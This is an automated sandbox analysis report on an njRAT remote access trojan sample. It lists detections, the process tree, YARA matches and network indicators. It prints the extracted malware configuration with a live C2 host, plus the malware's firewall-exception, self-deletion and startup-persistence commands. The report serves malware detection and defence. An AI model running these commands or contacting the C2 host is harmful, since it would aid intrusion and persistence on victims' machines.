Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ESjy0irMIn.exe

Overview

General Information

Sample Name:ESjy0irMIn.exe
Original Sample Name:536018D01EE05BC37064C480178E2BF8.exe
Analysis ID:1336857
MD5:536018d01ee05bc37064c480178e2bf8
SHA1:1d21d2d4f21fa7a19cad7e69c8c143bebc9ba7fd
SHA256:a9ea7800b0f50505268b058f14a23dbe4cf6c0f134681a68dce7429b9df8d88b
Tags:exenjratRAT
Infos:

Detection

Njrat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Sigma detected: Drops script at startup location
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Njrat
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Uses netsh to modify the Windows network and firewall settings
Machine Learning detection for sample
.NET source code contains potential unpacker
Drops script or batch files to the startup folder
Uses dynamic DNS services
.NET source code references suspicious native API functions
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Modifies the windows firewall
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Drops PE files to the application program directory (C:\ProgramData)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Found evasive API chain checking for process token information
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Enables debug privileges
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Creates or modifies windows services
Uses Microsoft's Enhanced Cryptographic Provider
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • ESjy0irMIn.exe (PID: 6720 cmdline: C:\Users\user\Desktop\ESjy0irMIn.exe MD5: 536018D01EE05BC37064C480178E2BF8)
    • dotNetFx40_Client_setup.exe (PID: 7084 cmdline: "C:\ProgramData\dotNetFx40_Client_setup.exe" MD5: 61446FDD76788229D3EBAEABE84DF38C)
      • Setup.exe (PID: 7232 cmdline: C:\b53dd3b256ba71dad061693a386e\\Setup.exe /x86 /x64 /ia64 /web MD5: 006F8A615020A4A17F5E63801485DF46)
        • WINWORD.EXE (PID: 7904 cmdline: C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo1.rtf MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
          • splwow64.exe (PID: 8048 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
        • WINWORD.EXE (PID: 6792 cmdline: C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo2.rtf MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • essam@sasa2023.exe (PID: 7172 cmdline: "C:\ProgramData\essam@sasa2023.exe" MD5: 7266F0DBCD9D7EE7F4618A70D3CB53EE)
      • netsh.exe (PID: 7392 cmdline: netsh firewall add allowedprogram "C:\ProgramData\essam@sasa2023.exe" "essam@sasa2023.exe" ENABLE MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
        • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 7492 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Name.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • essam@sasa2023.exe (PID: 7564 cmdline: "C:\ProgramData\essam@sasa2023.exe" MD5: 7266F0DBCD9D7EE7F4618A70D3CB53EE)
    • essam@sasa2023.exe (PID: 7648 cmdline: "C:\ProgramData\essam@sasa2023.exe" MD5: 7266F0DBCD9D7EE7F4618A70D3CB53EE)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
NjRATRedPacket Security describes NJRat as "a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives."It is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored.
  • AQUATIC PANDA
  • Earth Lusca
  • Operation C-Major
  • The Gorgon Group
https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat

Malware Configuration

Threatname: Njrat

{"Install Dir": "AppData", "Install Name": "idlll.exe", "Host": "bmw2022.ddns.net", "Port": "", "Mutex": "5552", "Registry Value": "7968e3cc8ecdfdd08a129deabeee4932", "Campaign ID": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Version": "TXlCb3Q=", "Network Seprator": "0.7d"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.4199118899.0000000002E91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NjratYara detected NjratJoe Security
    0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_NjratYara detected NjratJoe Security
      0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Njrat_30f3c220unknownunknown
      • 0x14867:$a1: get_Registry
      • 0x2d49f:$a1: get_Registry
      • 0x3741b:$a1: get_Registry
      • 0x15c18:$a2: SEE_MASK_NOZONECHECKS
      • 0x2e850:$a2: SEE_MASK_NOZONECHECKS
      • 0x387cc:$a2: SEE_MASK_NOZONECHECKS
      • 0x15a28:$a3: Download ERROR
      • 0x2e660:$a3: Download ERROR
      • 0x385dc:$a3: Download ERROR
      • 0x15d50:$a4: cmd.exe /c ping 0 -n 2 & del "
      • 0x2e988:$a4: cmd.exe /c ping 0 -n 2 & del "
      • 0x38904:$a4: cmd.exe /c ping 0 -n 2 & del "
      • 0x15cf0:$a5: netsh firewall delete allowedprogram "
      • 0x2e928:$a5: netsh firewall delete allowedprogram "
      • 0x388a4:$a5: netsh firewall delete allowedprogram "
      0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmpnjrat1Identify njRatBrian Wallace @botnet_hunter
      • 0x15c48:$a1: netsh firewall add allowedprogram
      • 0x2e880:$a1: netsh firewall add allowedprogram
      • 0x387fc:$a1: netsh firewall add allowedprogram
      • 0x15c18:$a2: SEE_MASK_NOZONECHECKS
      • 0x2e850:$a2: SEE_MASK_NOZONECHECKS
      • 0x387cc:$a2: SEE_MASK_NOZONECHECKS
      • 0x15dd8:$b1: [TAP]
      • 0x2ea10:$b1: [TAP]
      • 0x3898c:$b1: [TAP]
      • 0x15d50:$c3: cmd.exe /c ping
      • 0x2e988:$c3: cmd.exe /c ping
      • 0x38904:$c3: cmd.exe /c ping
      0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmpNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
      • 0x15c18:$reg: SEE_MASK_NOZONECHECKS
      • 0x2e850:$reg: SEE_MASK_NOZONECHECKS
      • 0x387cc:$reg: SEE_MASK_NOZONECHECKS
      • 0x15a04:$msg: Execute ERROR
      • 0x15a64:$msg: Execute ERROR
      • 0x2e63c:$msg: Execute ERROR
      • 0x2e69c:$msg: Execute ERROR
      • 0x385b8:$msg: Execute ERROR
      • 0x38618:$msg: Execute ERROR
      • 0x15d50:$ping: cmd.exe /c ping 0 -n 2 & del
      • 0x2e988:$ping: cmd.exe /c ping 0 -n 2 & del
      • 0x38904:$ping: cmd.exe /c ping 0 -n 2 & del
      Click to see the 8 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      11.2.essam@sasa2023.exe.4cc0000.5.unpackJoeSecurity_NjratYara detected NjratJoe Security
        11.2.essam@sasa2023.exe.4cc0000.5.unpackWindows_Trojan_Njrat_30f3c220unknownunknown
        • 0x3967:$a1: get_Registry
        • 0x4d18:$a2: SEE_MASK_NOZONECHECKS
        • 0x4b28:$a3: Download ERROR
        • 0x4e50:$a4: cmd.exe /c ping 0 -n 2 & del "
        • 0x4df0:$a5: netsh firewall delete allowedprogram "
        11.2.essam@sasa2023.exe.4cc0000.5.unpackCN_disclosed_20180208_cDetects malware from disclosed CN malware setFlorian Roth
        • 0x4e50:$x1: cmd.exe /c ping 0 -n 2 & del "
        • 0x4a22:$s1: winmgmts:\\.\root\SecurityCenter2
        • 0x4b4a:$s3: Executed As
        • 0x41b3:$s5: Stub.exe
        • 0x4b28:$s6: Download ERROR
        • 0x49e4:$s8: Select * From AntiVirusProduct
        11.2.essam@sasa2023.exe.4cc0000.5.unpacknjrat1Identify njRatBrian Wallace @botnet_hunter
        • 0x4d48:$a1: netsh firewall add allowedprogram
        • 0x4d18:$a2: SEE_MASK_NOZONECHECKS
        • 0x4ed8:$b1: [TAP]
        • 0x4e50:$c3: cmd.exe /c ping
        11.2.essam@sasa2023.exe.4cc0000.5.unpackNjratdetect njRAT in memoryJPCERT/CC Incident Response Group
        • 0x4d18:$reg: SEE_MASK_NOZONECHECKS
        • 0x4b04:$msg: Execute ERROR
        • 0x4b64:$msg: Execute ERROR
        • 0x4e50:$ping: cmd.exe /c ping 0 -n 2 & del
        Click to see the 28 entries

        Sigma Signatures

        Data Obfuscation

        barindex
        Sigma detected: Drops script at startup location
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\ProgramData\essam@sasa2023.exe, ProcessId: 7172, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Name.js

        Snort Signatures

        No Snort rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for dropped file
        Source: C:\ProgramData\essam@sasa2023.exeAvira: detection malicious, Label: HEUR/AGEN.1305400
        Found malware configuration
        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpackMalware Configuration Extractor: Njrat {"Install Dir": "AppData", "Install Name": "idlll.exe", "Host": "bmw2022.ddns.net", "Port": "", "Mutex": "5552", "Registry Value": "7968e3cc8ecdfdd08a129deabeee4932", "Campaign ID": "Software\\Microsoft\\Windows\\CurrentVersion\\Run", "Version": "TXlCb3Q=", "Network Seprator": "0.7d"}
        Multi AV Scanner detection for submitted file
        Source: ESjy0irMIn.exeReversingLabs: Detection: 73%
        Yara detected Njrat
        Source: Yara matchFile source: 11.2.essam@sasa2023.exe.4cc0000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.essam@sasa2023.exe.2aea0a4.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.essam@sasa2023.exe.2ada100.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.essam@sasa2023.exe.2aeb7cc.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000003.00000002.4199118899.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: essam@sasa2023.exe PID: 7172, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: essam@sasa2023.exe PID: 7648, type: MEMORYSTR
        Antivirus / Scanner detection for submitted sample
        Source: ESjy0irMIn.exeAvira: detected
        Multi AV Scanner detection for dropped file
        Source: C:\ProgramData\essam@sasa2023.exeReversingLabs: Detection: 79%
        Machine Learning detection for sample
        Source: ESjy0irMIn.exeJoe Sandbox ML: detected
        Machine Learning detection for dropped file
        Source: C:\ProgramData\essam@sasa2023.exeJoe Sandbox ML: detected
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_00017C12 LoadLibraryW,GetLastError,GetProcAddress,GetLastError,DecryptFileW,GetLastError,2_2_00017C12
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_0001751D CryptAcquireContextA,GetLastError,CryptGenRandom,GetLastError,CryptReleaseContext,2_2_0001751D
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69D98114 CryptDecodeObject,SetLastError,4_2_69D98114
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69D980D5 CryptMsgGetParam,SetLastError,4_2_69D980D5
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69D98094 CryptMsgGetAndVerifySigner,4_2_69D98094
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69D98083 CryptQueryObject,4_2_69D98083
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69D980A5 CryptHashPublicKeyInfo,SetLastError,4_2_69D980A5
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69DB17D1 __EH_prolog3,GetLastError,CertCloseStore,CryptMsgClose,GetLastError,CertFreeCertificateContext,CertCloseStore,CryptMsgClose,4_2_69DB17D1
        Source: ESjy0irMIn.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1033\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1025\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1028\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1030\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1031\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1029\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1036\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1035\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1032\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1038\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1037\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1040\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1041\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1042\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1044\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1043\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1046\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1045\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1055\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1053\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\2052\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\1049\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\3082\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\2070\eula.rtfJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\b53dd3b256ba71dad061693a386e\3076\eula.rtfJump to behavior
        Source: C:\ProgramData\essam@sasa2023.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeFile created: C:\Users\user\AppData\Local\Temp\dd_dotNetFx40_Client_setup_decompression_log.txtJump to behavior
        Source: ESjy0irMIn.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: sqmapi.pdb source: dotNetFx40_Client_setup.exe, 00000002.00000003.1762753670.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, dotNetFx40_Client_setup.exe, 00000002.00000003.1762071417.0000000005261000.00000004.00000020.00020000.00000000.sdmp, dotNetFx40_Client_setup.exe, 00000002.00000003.1762660238.00000000006A3000.00000004.00000020.00020000.00000000.sdmp, dotNetFx40_Client_setup.exe, 00000002.00000003.1762608912.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.4207935822.0000000069A71000.00000020.00000001.01000000.0000000F.sdmp, sqmapi.dll.2.dr
        Source: Binary string: SetupEngine.pdb source: dotNetFx40_Client_setup.exe, 00000002.00000003.1762071417.0000000004EE3000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, SetupEngine.dll.2.dr
        Source: Binary string: boxstub.pdb source: ESjy0irMIn.exe, dotNetFx40_Client_setup.exe.0.dr
        Source: Binary string: SetupUtility.pdb source: dotNetFx40_Client_setup.exe, 00000002.00000003.1762071417.0000000004EE3000.00000004.00000020.00020000.00000000.sdmp, SetupUtility.exe.2.dr
        Source: Binary string: Setup.pdb source: dotNetFx40_Client_setup.exe, 00000002.00000003.1762071417.0000000004EE3000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.4195199090.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Setup.exe, 00000004.00000000.1763277251.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Setup.exe.2.dr
        Source: Binary string: SetupResources.pdb source: dotNetFx40_Client_setup.exe, 00000002.00000003.1762071417.0000000005261000.00000004.00000020.00020000.00000000.sdmp, SetupResources.dll14.2.dr, SetupResources.dll18.2.dr, SetupResources.dll4.2.dr, SetupResources.dll9.2.dr, SetupResources.dll11.2.dr, SetupResources.dll15.2.dr, SetupResources.dll17.2.dr, SetupResources.dll13.2.dr, SetupResources.dll20.2.dr, SetupResources.dll3.2.dr, SetupResources.dll21.2.dr, SetupResources.dll22.2.dr, SetupResources.dll1.2.dr, SetupResources.dll6.2.dr, SetupResources.dll19.2.dr, SetupResources.dll7.2.dr, SetupResources.dll.2.dr, SetupResources.dll5.2.dr, SetupResources.dll16.2.dr, SetupResources.dll2.2.dr, SetupResources.dll0.2.dr, SetupResources.dll23.2.dr, SetupResources.dll8.2.dr, SetupResources.dll12.2.dr, SetupResources.dll10.2.dr
        Source: Binary string: SetupUi.pdb source: dotNetFx40_Client_setup.exe, 00000002.00000003.1762071417.0000000005261000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, SetupUi.dll.2.dr
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_0001774A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLastError,GetLogicalDriveStringsW,CharUpperW,_wcschr,GetDiskFreeSpaceExW,2_2_0001774A
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_000192BB GetFileAttributesW,GetLastError,SetFileAttributesW,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,GetLastError,FindNextFileW,GetLastError,FindClose,RemoveDirectoryW,GetLastError,2_2_000192BB
        Source: C:\ProgramData\dotNetFx40_Client_setup.exeCode function: 2_2_0001A7B1 FindFirstFileW,GetLastError,FindNextFileW,CloseHandle,FindClose,2_2_0001A7B1
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69A88097 memset,memset,FindFirstFileW,DeleteFileW,GetLastError,FindNextFileW,FindClose,4_2_69A88097
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69A74281 memset,EnterCriticalSection,FindFirstFileW,LeaveCriticalSection,ctype,FindNextFileW,FindClose,ResetEvent,CreateThread,CloseHandle,GetLastError,4_2_69A74281
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69D85B82 __EH_prolog3_GS,_memset,FindFirstFileW,FindNextFileW,FindClose,4_2_69D85B82
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exeCode function: 4_2_69D8410A FindFirstFileW,GetFullPathNameW,SetLastError,_wcsrchr,_wcsrchr,4_2_69D8410A

        Networking

        barindex
        Uses dynamic DNS services
        Source: unknownDNS query: name: bmw2022.ddns.net
        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractorURLs: bmw2022.ddns.net
        Source: Joe Sandbox ViewASN Name: TE-ASTE-ASEG TE-ASTE-ASEG
        Source: global trafficTCP traffic: 192.168.2.4:49734 -> 156.196.162.149:5552
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
        Source: Setup.exe, 00000004.00000003.1785674424.0000000000C68000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000004.00000003.1789361376.0000000000C68000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000004.00000003.1785067894.0000000000C68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.micra
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
        Source: ESjy0irMIn.exe, 00000000.00000002.1752276948.00000000023B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: http://weather.service.msn.com/data.aspx
        Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
        Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
        Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
        Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
        Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
        Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
        Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
        Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
        Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
        Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
        Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
        Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
        Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
        Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
        Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
        Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
        Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
        Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
        Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
        Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
        Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
        Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
        Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
        Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
        Source: ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
        Source: DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
